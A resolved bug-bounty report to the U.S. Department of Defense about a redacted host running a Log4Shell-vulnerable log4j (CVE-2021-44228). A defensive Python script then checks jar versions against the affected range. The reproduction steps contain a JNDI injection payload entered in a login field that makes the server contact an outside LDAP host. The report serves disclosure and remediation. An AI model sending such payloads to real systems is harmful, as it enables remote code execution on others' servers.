██████████ running a vulnerable log4j
Critical
U.S. Dept Of Defense
Reported by
alex_gaynor
Vulnerability Details
Technical details and impact analysis
**Description:**
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
## Impact
Probably arbitrary code execution
## System Host(s)
████████
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2021-44228
## Steps to Reproduce
1. Browse to https://████████/███████https%3A%2F%2F█████████%2F
2. Enter a `${jndi:ldap://dns-server-you-control/a}` into the username field
3. Enter a random password
4. Submit
Observe that a request was made to your DNS server. This strongly suggests a vulnerable log4j.
## Suggested Mitigation/Remediation Actions
Update log4j or disable jndi support.
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2021-44228
UNKNOWN
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from …
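
A version triage against the affected range quoted in the CVE description above, as an added example that is not part of the original report. The jar paths in `SAMPLE` are constructed, and the `log4j-core-<version>.jar` filename pattern is an assumption about how the jars are named on disk.

```python
import re

# Range and exclusions as stated in the CVE-2021-44228 description above.
FIRST_AFFECTED, LAST_AFFECTED = "2.0-beta9", "2.15.0"
FIXED_BACKPORTS = {"2.12.2", "2.12.3", "2.3.1"}
# Assumption: jars keep the default name log4j-core-<version>.jar.
JAR_RE = re.compile(r"log4j-core-([^/\\]+)\.jar$", re.I)
QUAL_RANK = {"alpha": 0, "beta": 1, "rc": 2}  # pre-releases sort before the final

# Constructed inventory (e.g. output of a file search), not data from the report.
SAMPLE = [
    "/opt/app/lib/log4j-core-2.14.1.jar", "/opt/app/lib/log4j-api-2.14.1.jar",
    "/opt/legacy/lib/log4j-core-2.12.2.jar", "/opt/old/log4j-core-2.0-beta8.jar",
    "/opt/new/lib/log4j-core-2.17.1.jar", "/opt/dev/log4j-core-2.15.0-SNAPSHOT.jar",
]

def version_key(version):
    """Map '2.0-beta9' to a sortable tuple; raise ValueError on unknown shapes."""
    m = re.fullmatch(r"(\d+(?:\.\d+){0,2})(?:-(alpha|beta|rc)(\d+))?", version.lower())
    if not m:
        raise ValueError(f"unrecognised version: {version!r}")
    nums = [int(part) for part in m.group(1).split(".")]
    nums += [0] * (3 - len(nums))  # treat 2.3 as 2.3.0
    qual = (QUAL_RANK[m.group(2)], int(m.group(3))) if m.group(2) else (3, 0)
    return tuple(nums) + qual

def in_affected_range(version):
    """True if the version falls in the range the CVE description gives."""
    key = version_key(version)  # validate before consulting the exclusion list
    if version in FIXED_BACKPORTS:
        return False
    return version_key(FIRST_AFFECTED) <= key <= version_key(LAST_AFFECTED)

def verdict(version):
    try:
        return "affected" if in_affected_range(version) else "outside range"
    except ValueError:
        return "unknown version"  # e.g. SNAPSHOT or vendor builds: inspect by hand

def triage(paths):
    """Return {path: verdict} for each log4j-core jar found in a path listing."""
    hits = ((p, JAR_RE.search(p)) for p in paths)
    return {p: verdict(m.group(1)) for p, m in hits if m}

if __name__ == "__main__":
    for path, result in triage(SAMPLE).items():
        print(f"{result:15} {path}")
```

Filename matching misses log4j classes bundled inside shaded or fat jars, and "outside range" refers only to the range quoted in this description.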
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Use of Externally-Controlled Format String